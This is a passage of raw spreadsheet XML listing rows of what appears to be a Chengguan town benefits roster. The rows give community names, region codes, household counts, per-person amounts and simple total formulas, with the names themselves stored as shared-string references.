      <c r="C994" s="17" t="s">
        <v>2648</v>
      </c>
      <c r="D994" s="17" t="s">
        <v>2649</v>
      </c>
      <c r="E994" s="17" t="s">
        <v>337</v>
      </c>
      <c r="F994" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G994" s="17">
        <v>1</v>
      </c>
      <c r="H994" s="18">
        <v>365</v>
      </c>
      <c r="I994" s="17">
        <f>H994*G994</f>
        <v>365</v>
      </c>
      <c r="J994" s="29">
        <v>45108</v>
      </c>
      <c r="K994" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="995" customHeight="1" spans="1:11">
      <c r="A995" s="16" t="s">
        <v>2650</v>
      </c>
      <c r="B995" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C995" s="17" t="s">
        <v>2651</v>
      </c>
      <c r="D995" s="17" t="s">
        <v>2652</v>
      </c>
      <c r="E995" s="17" t="s">
        <v>617</v>
      </c>
      <c r="F995" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G995" s="17">
        <v>1</v>
      </c>
      <c r="H995" s="18">
        <v>365</v>
      </c>
      <c r="I995" s="17">
        <f>H995*G995</f>
        <v>365</v>
      </c>
      <c r="J995" s="29">
        <v>45108</v>
      </c>
      <c r="K995" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="996" customHeight="1" spans="1:11">
      <c r="A996" s="16" t="s">
        <v>2653</v>
      </c>
      <c r="B996" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C996" s="17" t="s">
        <v>2638</v>
      </c>
      <c r="D996" s="17" t="s">
        <v>1691</v>
      </c>
      <c r="E996" s="17" t="s">
        <v>2654</v>
      </c>
      <c r="F996" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G996" s="17">
        <v>1</v>
      </c>
      <c r="H996" s="18">
        <v>365</v>
      </c>
      <c r="I996" s="17">
        <f>H996*G996</f>
        <v>365</v>
      </c>
      <c r="J996" s="29">
        <v>45108</v>
      </c>
      <c r="K996" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="997" customHeight="1" spans="1:11">
      <c r="A997" s="16" t="s">
        <v>2655</v>
      </c>
      <c r="B997" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C997" s="17" t="s">
        <v>2638</v>
      </c>
      <c r="D997" s="17" t="s">
        <v>2656</v>
      </c>
      <c r="E997" s="17" t="s">
        <v>432</v>
      </c>
      <c r="F997" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G997" s="17">
        <v>1</v>
      </c>
      <c r="H997" s="18">
        <v>365</v>
      </c>
      <c r="I997" s="17">
        <f>H997*G997</f>
        <v>365</v>
      </c>
      <c r="J997" s="29">
        <v>45108</v>
      </c>
      <c r="K997" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="998" customHeight="1" spans="1:11">
      <c r="A998" s="16" t="s">
        <v>2657</v>
      </c>
      <c r="B998" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C998" s="17" t="s">
        <v>2642</v>
      </c>
      <c r="D998" s="17" t="s">
        <v>2658</v>
      </c>
      <c r="E998" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F998" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G998" s="17">
        <v>2</v>
      </c>
      <c r="H998" s="18">
        <v>325</v>
      </c>
      <c r="I998" s="17">
        <f>H998*G998</f>
        <v>650</v>
      </c>
      <c r="J998" s="29">
        <v>45108</v>
      </c>
      <c r="K998" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="999" customHeight="1" spans="1:11">
      <c r="A999" s="16" t="s">
        <v>2659</v>
      </c>
      <c r="B999" s="17" t="str">
        <f>B998</f>
        <v>城关镇</v>
      </c>
      <c r="C999" s="17" t="str">
        <f>C998</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D999" s="16" t="s">
        <v>2660</v>
      </c>
      <c r="E999" s="16" t="s">
        <v>2661</v>
      </c>
      <c r="F999" s="17" t="str">
        <f>F998</f>
        <v>4113210102</v>
      </c>
      <c r="G999" s="17"/>
      <c r="H999" s="17"/>
      <c r="I999" s="17"/>
      <c r="J999" s="29"/>
      <c r="K999" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1000" customHeight="1" spans="1:11">
      <c r="A1000" s="16" t="s">
        <v>2662</v>
      </c>
      <c r="B1000" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1000" s="17" t="s">
        <v>2642</v>
      </c>
      <c r="D1000" s="17" t="s">
        <v>2663</v>
      </c>
      <c r="E1000" s="17" t="s">
        <v>703</v>
      </c>
      <c r="F1000" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1000" s="17">
        <v>1</v>
      </c>
      <c r="H1000" s="18">
        <v>365</v>
      </c>
      <c r="I1000" s="17">
        <f>H1000*G1000</f>
        <v>365</v>
      </c>
      <c r="J1000" s="29">
        <v>45108</v>
      </c>
      <c r="K1000" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1001" customHeight="1" spans="1:11">
      <c r="A1001" s="16" t="s">
        <v>2664</v>
      </c>
      <c r="B1001" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1001" s="17" t="s">
        <v>2642</v>
      </c>
      <c r="D1001" s="17" t="s">
        <v>2665</v>
      </c>
      <c r="E1001" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F1001" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1001" s="17">
        <v>1</v>
      </c>
      <c r="H1001" s="18">
        <v>365</v>
      </c>
      <c r="I1001" s="17">
        <f>H1001*G1001</f>
        <v>365</v>
      </c>
      <c r="J1001" s="29">
        <v>45108</v>
      </c>
      <c r="K1001" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1002" customHeight="1" spans="1:11">
      <c r="A1002" s="16" t="s">
        <v>2666</v>
      </c>
      <c r="B1002" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1002" s="17" t="s">
        <v>2642</v>
      </c>
      <c r="D1002" s="17" t="s">
        <v>2667</v>
      </c>
      <c r="E1002" s="17" t="s">
        <v>2668</v>
      </c>
      <c r="F1002" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1002" s="17">
        <v>1</v>
      </c>
      <c r="H1002" s="18">
        <v>365</v>
      </c>
      <c r="I1002" s="17">
        <f>H1002*G1002</f>
        <v>365</v>
      </c>
      <c r="J1002" s="29">
        <v>45108</v>
      </c>
      <c r="K1002" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1003" customHeight="1" spans="1:11">
      <c r="A1003" s="16" t="s">
        <v>2669</v>
      </c>
      <c r="B1003" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1003" s="17" t="s">
        <v>2642</v>
      </c>
      <c r="D1003" s="17" t="s">
        <v>2670</v>
      </c>
      <c r="E1003" s="17" t="s">
        <v>2671</v>
      </c>
      <c r="F1003" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1003" s="17">
        <v>1</v>
      </c>
      <c r="H1003" s="18">
        <v>365</v>
      </c>
      <c r="I1003" s="17">
        <f>H1003*G1003</f>
        <v>365</v>
      </c>
      <c r="J1003" s="29">
        <v>45108</v>
      </c>
      <c r="K1003" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1004" customHeight="1" spans="1:11">
      <c r="A1004" s="16" t="s">
        <v>2672</v>
      </c>
      <c r="B1004" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1004" s="17" t="s">
        <v>2642</v>
      </c>
      <c r="D1004" s="17" t="s">
        <v>2673</v>
      </c>
      <c r="E1004" s="17" t="s">
        <v>281</v>
      </c>
      <c r="F1004" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1004" s="17">
        <v>2</v>
      </c>
      <c r="H1004" s="18">
        <v>325</v>
      </c>
      <c r="I1004" s="17">
        <f>H1004*G1004</f>
        <v>650</v>
      </c>
      <c r="J1004" s="29">
        <v>45108</v>
      </c>
      <c r="K1004" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1005" customHeight="1" spans="1:11">
      <c r="A1005" s="16" t="s">
        <v>2674</v>
      </c>
      <c r="B1005" s="17" t="str">
        <f>B1004</f>
        <v>城关镇</v>
      </c>
      <c r="C1005" s="17" t="str">
        <f>C1004</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D1005" s="24" t="s">
        <v>2675</v>
      </c>
      <c r="E1005" s="24" t="s">
        <v>2676</v>
      </c>
      <c r="F1005" s="17" t="str">
        <f>F1004</f>
        <v>4113210102</v>
      </c>
      <c r="G1005" s="17"/>
      <c r="H1005" s="17"/>
      <c r="I1005" s="17"/>
      <c r="J1005" s="29"/>
      <c r="K1005" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1006" customHeight="1" spans="1:11">
      <c r="A1006" s="16" t="s">
        <v>2677</v>
      </c>
      <c r="B1006" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1006" s="17" t="s">
        <v>2642</v>
      </c>
      <c r="D1006" s="17" t="s">
        <v>2678</v>
      </c>
      <c r="E1006" s="17" t="s">
        <v>1467</v>
      </c>
      <c r="F1006" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1006" s="17">
        <v>2</v>
      </c>
      <c r="H1006" s="18">
        <v>325</v>
      </c>
      <c r="I1006" s="17">
        <f>H1006*G1006</f>
        <v>650</v>
      </c>
      <c r="J1006" s="29">
        <v>45108</v>
      </c>
      <c r="K1006" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1007" customHeight="1" spans="1:11">
      <c r="A1007" s="16" t="s">
        <v>2679</v>
      </c>
      <c r="B1007" s="17" t="str">
        <f>B1006</f>
        <v>城关镇</v>
      </c>
      <c r="C1007" s="17" t="str">
        <f>C1006</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D1007" s="23" t="s">
        <v>2680</v>
      </c>
      <c r="E1007" s="23" t="s">
        <v>2284</v>
      </c>
      <c r="F1007" s="17" t="str">
        <f>F1006</f>
        <v>4113210102</v>
      </c>
      <c r="G1007" s="17"/>
      <c r="H1007" s="17"/>
      <c r="I1007" s="17"/>
      <c r="J1007" s="29"/>
      <c r="K1007" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1008" customHeight="1" spans="1:11">
      <c r="A1008" s="16" t="s">
        <v>2681</v>
      </c>
      <c r="B1008" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1008" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D1008" s="17" t="s">
        <v>2682</v>
      </c>
      <c r="E1008" s="17" t="s">
        <v>435</v>
      </c>
      <c r="F1008" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G1008" s="17">
        <v>1</v>
      </c>
      <c r="H1008" s="18">
        <v>365</v>
      </c>
      <c r="I1008" s="17">
        <f>H1008*G1008</f>
        <v>365</v>
      </c>
      <c r="J1008" s="29">
        <v>45108</v>
      </c>
      <c r="K1008" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1009" customHeight="1" spans="1:11">
      <c r="A1009" s="16" t="s">
        <v>2683</v>
      </c>
      <c r="B1009" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1009" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D1009" s="17" t="s">
        <v>2684</v>
      </c>
      <c r="E1009" s="17" t="s">
        <v>1265</v>
      </c>
      <c r="F1009" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G1009" s="17">
        <v>1</v>
      </c>
      <c r="H1009" s="18">
        <v>365</v>
      </c>
      <c r="I1009" s="17">
        <f>H1009*G1009</f>
        <v>365</v>
      </c>
      <c r="J1009" s="29">
        <v>45108</v>
      </c>
      <c r="K1009" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1010" customHeight="1" spans="1:11">
      <c r="A1010" s="16" t="s">
        <v>2685</v>
      </c>
      <c r="B1010" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1010" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1010" s="17" t="s">
        <v>2686</v>
      </c>
      <c r="E1010" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F1010" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1010" s="17">
        <v>2</v>
      </c>
      <c r="H1010" s="18">
        <v>325</v>
      </c>
      <c r="I1010" s="17">
        <f>H1010*G1010</f>
        <v>650</v>
      </c>
      <c r="J1010" s="29">
        <v>45108</v>
      </c>
      <c r="K1010" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1011" customHeight="1" spans="1:11">
      <c r="A1011" s="16" t="s">
        <v>2687</v>
      </c>
      <c r="B1011" s="17" t="str">
        <f>B1010</f>
        <v>城关镇</v>
      </c>
      <c r="C1011" s="17" t="str">
        <f>C1010</f>
        <v>中华社区</v>
      </c>
      <c r="D1011" s="23" t="s">
        <v>2688</v>
      </c>
      <c r="E1011" s="23" t="s">
        <v>2689</v>
      </c>
      <c r="F1011" s="17" t="str">
        <f>F1010</f>
        <v>4113210108</v>
      </c>
      <c r="G1011" s="17"/>
      <c r="H1011" s="17"/>
      <c r="I1011" s="17"/>
      <c r="J1011" s="29"/>
      <c r="K1011" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1012" customHeight="1" spans="1:11">
      <c r="A1012" s="16" t="s">
        <v>2690</v>
      </c>
      <c r="B1012" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1012" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1012" s="17" t="s">
        <v>2691</v>
      </c>
      <c r="E1012" s="17" t="s">
        <v>773</v>
      </c>
      <c r="F1012" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1012" s="17">
        <v>1</v>
      </c>
      <c r="H1012" s="18">
        <v>365</v>
      </c>
      <c r="I1012" s="17">
        <f>H1012*G1012</f>
        <v>365</v>
      </c>
      <c r="J1012" s="29">
        <v>45108</v>
      </c>
      <c r="K1012" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1013" customHeight="1" spans="1:11">
      <c r="A1013" s="16" t="s">
        <v>2692</v>
      </c>
      <c r="B1013" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1013" s="17" t="s">
        <v>2045</v>
      </c>
      <c r="D1013" s="17" t="s">
        <v>2693</v>
      </c>
      <c r="E1013" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F1013" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1013" s="17">
        <v>1</v>
      </c>
      <c r="H1013" s="18">
        <v>365</v>
      </c>
      <c r="I1013" s="17">
        <f>H1013*G1013</f>
        <v>365</v>
      </c>
      <c r="J1013" s="29">
        <v>45108</v>
      </c>
      <c r="K1013" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1014" customHeight="1" spans="1:11">
      <c r="A1014" s="16" t="s">
        <v>2694</v>
      </c>
      <c r="B1014" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1014" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D1014" s="17" t="s">
        <v>2695</v>
      </c>
      <c r="E1014" s="17" t="s">
        <v>1553</v>
      </c>
      <c r="F1014" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G1014" s="17">
        <v>2</v>
      </c>
      <c r="H1014" s="18">
        <v>325</v>
      </c>
      <c r="I1014" s="17">
        <f>H1014*G1014</f>
        <v>650</v>
      </c>
      <c r="J1014" s="29">
        <v>45108</v>
      </c>
      <c r="K1014" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1015" customHeight="1" spans="1:11">
      <c r="A1015" s="16" t="s">
        <v>2696</v>
      </c>
      <c r="B1015" s="17" t="str">
        <f>B1014</f>
        <v>城关镇</v>
      </c>
      <c r="C1015" s="17" t="str">
        <f>C1014</f>
        <v>西北社区</v>
      </c>
      <c r="D1015" s="23" t="s">
        <v>2697</v>
      </c>
      <c r="E1015" s="23" t="s">
        <v>2698</v>
      </c>
      <c r="F1015" s="17" t="str">
        <f>F1014</f>
        <v>4113210106</v>
      </c>
      <c r="G1015" s="17"/>
      <c r="H1015" s="17"/>
      <c r="I1015" s="17"/>
      <c r="J1015" s="17"/>
      <c r="K1015" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1016" customHeight="1" spans="1:11">
      <c r="A1016" s="16" t="s">
        <v>2699</v>
      </c>
      <c r="B1016" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1016" s="17" t="s">
        <v>2045</v>
      </c>
      <c r="D1016" s="17" t="s">
        <v>2700</v>
      </c>
      <c r="E1016" s="17" t="s">
        <v>1077</v>
      </c>
      <c r="F1016" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1016" s="17">
        <v>1</v>
      </c>
      <c r="H1016" s="18">
        <v>365</v>
      </c>
      <c r="I1016" s="17">
        <f t="shared" ref="I1016:I1024" si="50">H1016*G1016</f>
        <v>365</v>
      </c>
      <c r="J1016" s="17">
        <v>45139</v>
      </c>
      <c r="K1016" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1017" customHeight="1" spans="1:11">
      <c r="A1017" s="16" t="s">
        <v>2701</v>
      </c>
      <c r="B1017" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1017" s="17" t="s">
        <v>2045</v>
      </c>
      <c r="D1017" s="17" t="s">
        <v>2702</v>
      </c>
      <c r="E1017" s="17" t="s">
        <v>923</v>
      </c>
      <c r="F1017" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1017" s="17">
        <v>1</v>
      </c>
      <c r="H1017" s="18">
        <v>365</v>
      </c>
      <c r="I1017" s="17">
        <f t="shared" si="50"/>
        <v>365</v>
      </c>
      <c r="J1017" s="17">
        <v>45139</v>
      </c>
      <c r="K1017" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1018" customHeight="1" spans="1:11">
      <c r="A1018" s="16" t="s">
        <v>2703</v>
      </c>
      <c r="B1018" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1018" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D1018" s="17" t="s">
        <v>2704</v>
      </c>
      <c r="E1018" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F1018" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G1018" s="17">
        <v>1</v>
      </c>
      <c r="H1018" s="18">
        <v>365</v>
      </c>
      <c r="I1018" s="17">
        <f t="shared" si="50"/>
        <v>365</v>
      </c>
      <c r="J1018" s="17">
        <v>45139</v>
      </c>
      <c r="K1018" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1019" customHeight="1" spans="1:11">
      <c r="A1019" s="16" t="s">
        <v>2705</v>
      </c>
      <c r="B1019" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1019" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D1019" s="17" t="s">
        <v>2706</v>
      </c>
      <c r="E1019" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F1019" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G1019" s="17">
        <v>1</v>
      </c>
      <c r="H1019" s="18">
        <v>365</v>
      </c>
      <c r="I1019" s="17">
        <f t="shared" si="50"/>
        <v>365</v>
      </c>
      <c r="J1019" s="17">
        <v>45139</v>
      </c>
      <c r="K1019" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1020" customHeight="1" spans="1:11">
      <c r="A1020" s="16" t="s">
        <v>2707</v>
      </c>
      <c r="B1020" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1020" s="17" t="s">
        <v>2708</v>
      </c>
      <c r="D1020" s="17" t="s">
        <v>2709</v>
      </c>
      <c r="E1020" s="17" t="s">
        <v>2710</v>
      </c>
      <c r="F1020" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1020" s="17">
        <v>1</v>
      </c>
      <c r="H1020" s="18">
        <v>365</v>
      </c>
      <c r="I1020" s="17">
        <f t="shared" si="50"/>
        <v>365</v>
      </c>
      <c r="J1020" s="17">
        <v>45139</v>
      </c>
      <c r="K1020" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1021" customHeight="1" spans="1:11">
      <c r="A1021" s="16" t="s">
        <v>2711</v>
      </c>
      <c r="B1021" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1021" s="17" t="s">
        <v>2712</v>
      </c>
      <c r="D1021" s="17" t="s">
        <v>2713</v>
      </c>
      <c r="E1021" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F1021" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1021" s="17">
        <v>1</v>
      </c>
      <c r="H1021" s="18">
        <v>365</v>
      </c>
      <c r="I1021" s="17">
        <f t="shared" si="50"/>
        <v>365</v>
      </c>
      <c r="J1021" s="17">
        <v>45139</v>
      </c>
      <c r="K1021" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1022" customHeight="1" spans="1:11">
      <c r="A1022" s="16" t="s">
        <v>2714</v>
      </c>
      <c r="B1022" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1022" s="17" t="s">
        <v>2715</v>
      </c>
      <c r="D1022" s="17" t="s">
        <v>2716</v>
      </c>
      <c r="E1022" s="17" t="s">
        <v>2717</v>
      </c>
      <c r="F1022" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1022" s="17">
        <v>1</v>
      </c>
      <c r="H1022" s="18">
        <v>365</v>
      </c>
      <c r="I1022" s="17">
        <f t="shared" si="50"/>
        <v>365</v>
      </c>
      <c r="J1022" s="17">
        <v>45139</v>
      </c>
      <c r="K1022" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1023" customHeight="1" spans="1:11">
      <c r="A1023" s="16" t="s">
        <v>2718</v>
      </c>
      <c r="B1023" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1023" s="17" t="s">
        <v>2719</v>
      </c>
      <c r="D1023" s="17" t="s">
        <v>2720</v>
      </c>
      <c r="E1023" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F1023" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1023" s="17">
        <v>1</v>
      </c>
      <c r="H1023" s="18">
        <v>365</v>
      </c>
      <c r="I1023" s="17">
        <f t="shared" si="50"/>
        <v>365</v>
      </c>
      <c r="J1023" s="17">
        <v>45139</v>
      </c>
      <c r="K1023" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1024" customHeight="1" spans="1:11">
      <c r="A1024" s="16" t="s">
        <v>2721</v>
      </c>
      <c r="B1024" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1024" s="17" t="s">
        <v>2722</v>
      </c>
      <c r="D1024" s="17" t="s">
        <v>2723</v>
      </c>
      <c r="E1024" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F1024" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1024" s="17">
        <v>3</v>
      </c>
      <c r="H1024" s="18">
        <v>290</v>
      </c>
      <c r="I1024" s="17">
        <f t="shared" si="50"/>
        <v>870</v>
      </c>
      <c r="J1024" s="17">
        <v>45139</v>
      </c>
      <c r="K1024" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1025" customHeight="1" spans="1:11">
      <c r="A1025" s="16" t="s">
        <v>2724</v>
      </c>
      <c r="B1025" s="17" t="str">
        <f>B1024</f>
        <v>城关镇</v>
      </c>
      <c r="C1025" s="17" t="str">
        <f>C1024</f>
        <v>税务局中华办理</v>
      </c>
      <c r="D1025" s="19" t="s">
        <v>2725</v>
      </c>
      <c r="E1025" s="19" t="s">
        <v>1676</v>
      </c>
      <c r="F1025" s="17" t="str">
        <f>F1024</f>
        <v>4113210108</v>
      </c>
      <c r="G1025" s="17"/>
      <c r="H1025" s="17"/>
      <c r="I1025" s="17"/>
      <c r="J1025" s="17"/>
      <c r="K1025" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1026" customHeight="1" spans="1:11">
      <c r="A1026" s="16" t="s">
        <v>2726</v>
      </c>
      <c r="B1026" s="17" t="str">
        <f>B1025</f>
        <v>城关镇</v>
      </c>
      <c r="C1026" s="17" t="str">
        <f>C1025</f>
        <v>税务局中华办理</v>
      </c>
      <c r="D1026" s="19" t="s">
        <v>2727</v>
      </c>
      <c r="E1026" s="19" t="s">
        <v>603</v>
      </c>
      <c r="F1026" s="17" t="str">
        <f>F1025</f>
        <v>4113210108</v>
      </c>
      <c r="G1026" s="17"/>
      <c r="H1026" s="17"/>
      <c r="I1026" s="17"/>
      <c r="J1026" s="17"/>
      <c r="K1026" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1027" customHeight="1" spans="1:11">
      <c r="A1027" s="16" t="s">
        <v>2728</v>
      </c>
      <c r="B1027" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1027" s="17" t="s">
        <v>2729</v>
      </c>
      <c r="D1027" s="17" t="s">
        <v>2730</v>
      </c>
      <c r="E1027" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F1027" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1027" s="17">
        <v>1</v>
      </c>
      <c r="H1027" s="18">
        <v>365</v>
      </c>
      <c r="I1027" s="17">
        <f>H1027*G1027</f>
        <v>365</v>
      </c>
      <c r="J1027" s="17">
        <v>45139</v>
      </c>
      <c r="K1027" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1028" customHeight="1" spans="1:11">
      <c r="A1028" s="16" t="s">
        <v>2731</v>
      </c>
      <c r="B1028" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1028" s="17" t="s">
        <v>2732</v>
      </c>
      <c r="D1028" s="17" t="s">
        <v>2733</v>
      </c>
      <c r="E1028" s="17" t="s">
        <v>2734</v>
      </c>
      <c r="F1028" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1028" s="17">
        <v>1</v>
      </c>
      <c r="H1028" s="18">
        <v>365</v>
      </c>
      <c r="I1028" s="17">
        <f>H1028*G1028</f>
        <v>365</v>
      </c>
      <c r="J1028" s="17">
        <v>45139</v>
      </c>
      <c r="K1028" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1029" customHeight="1" spans="1:11">
      <c r="A1029" s="16" t="s">
        <v>2735</v>
      </c>
      <c r="B1029" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1029" s="17" t="s">
        <v>2736</v>
      </c>
      <c r="D1029" s="17" t="s">
        <v>2737</v>
      </c>
      <c r="E1029" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F1029" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1029" s="17">
        <v>1</v>
      </c>
      <c r="H1029" s="18">
        <v>365</v>
      </c>
      <c r="I1029" s="17">
        <f>H1029*G1029</f>
        <v>365</v>
      </c>
      <c r="J1029" s="17">
        <v>45139</v>
      </c>
      <c r="K1029" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1030" customHeight="1" spans="1:11">
      <c r="A1030" s="16" t="s">
        <v>2738</v>
      </c>
      <c r="B1030" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1030" s="17" t="s">
        <v>2739</v>
      </c>
      <c r="D1030" s="17" t="s">
        <v>2740</v>
      </c>
      <c r="E1030" s="17" t="s">
        <v>773</v>
      </c>
      <c r="F1030" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1030" s="17">
        <v>1</v>
      </c>
      <c r="H1030" s="18">
        <v>365</v>
      </c>
      <c r="I1030" s="17">
        <f>H1030*G1030</f>
        <v>365</v>
      </c>
      <c r="J1030" s="17">
        <v>45139</v>
      </c>
      <c r="K1030" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1031" customHeight="1" spans="1:11">
      <c r="A1031" s="16" t="s">
        <v>2741</v>
      </c>
      <c r="B1031" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1031" s="17" t="s">
        <v>2742</v>
      </c>
      <c r="D1031" s="17" t="s">
        <v>2743</v>
      </c>
      <c r="E1031" s="17" t="s">
        <v>923</v>
      </c>
      <c r="F1031" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G1031" s="17">
        <v>1</v>
      </c>
      <c r="H1031" s="18">
        <v>365</v>
      </c>
      <c r="I1031" s="17">
        <f t="shared" ref="I1031:I1038" si="51">H1031*G1031</f>
        <v>365</v>
      </c>
      <c r="J1031" s="17">
        <v>45139</v>
      </c>
      <c r="K1031" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1032" customHeight="1" spans="1:11">
      <c r="A1032" s="16" t="s">
        <v>2744</v>
      </c>
      <c r="B1032" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1032" s="17" t="s">
        <v>2745</v>
      </c>
      <c r="D1032" s="17" t="s">
        <v>2746</v>
      </c>
      <c r="E1032" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F1032" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G1032" s="17">
        <v>1</v>
      </c>
      <c r="H1032" s="18">
        <v>365</v>
      </c>
      <c r="I1032" s="17">
        <f t="shared" si="51"/>
        <v>365</v>
      </c>
      <c r="J1032" s="17">
        <v>45139</v>
      </c>
      <c r="K1032" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1033" customHeight="1" spans="1:11">
      <c r="A1033" s="16" t="s">
        <v>2747</v>
      </c>
      <c r="B1033" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1033" s="17" t="s">
        <v>2745</v>
      </c>
      <c r="D1033" s="17" t="s">
        <v>2748</v>
      </c>
      <c r="E1033" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F1033" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G1033" s="17">
        <v>1</v>
      </c>
      <c r="H1033" s="18">
        <v>365</v>
      </c>
      <c r="I1033" s="17">
        <f t="shared" si="51"/>
        <v>365</v>
      </c>
